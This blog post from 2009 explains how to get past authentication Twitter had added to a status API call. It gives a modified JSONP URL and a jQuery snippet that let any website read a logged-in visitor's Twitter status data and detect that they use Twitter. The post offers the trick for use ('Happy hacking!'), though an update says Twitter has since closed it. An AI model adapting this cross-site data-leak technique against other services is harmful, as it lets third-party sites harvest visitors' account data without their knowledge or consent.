Twitter "protects" API user status call… but doesn't

John Resig alerting about the authentication change

UPDATE 2/24/09: Twitter has changed their API and this technique no longer works.

For the last week or so, there’s been a lot of commentary about how you could detect if a Twitter user was visiting your site based on the response of a public, non-authenticated API call. It was documented at Ajaxian.

John Resig was one of the first to notice earlier today that Twitter has placed the API call in question behind http authentication. Indeed, the link he provides to Venture Hacks issues a login alert when you visit the page.

However, this does absolutely nothing to prevent a 3rd party from still accessing this information. Twitter is likely to fix this soon, but here’s how to use it in the mean time.

Basically, the API url that is now issuing the authentication requirement was this:

http://twitter.com/statuses/user_timeline.json&count=1&hasTwitter&suppress_response_codes


By simply changing the query string slightly, you bypass authentication and retrieve the user’s status data again if they are logged in. This works without the “/?callback=” part, but this is needed to have have Twitter wrap the json object so that it can be used in the browser, ala jsonp.

http://twitter.com/statuses/user_timeline/?callback=usrobj


If you use jQuery, the simple bit of code that returns this is:

$.ajax({
dataType: 'jsonp',
data: '',
jsonp: 'callback',
url: 'http://twitter.com/statuses/user_timeline/',
success: function(jsondata) {
alert(jsondata.toSource());
},
});


To use this to determine if a visitor is logged into Twitter or not, use the methods described in the Ajaxian article and just change the link. Happy hacking!

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>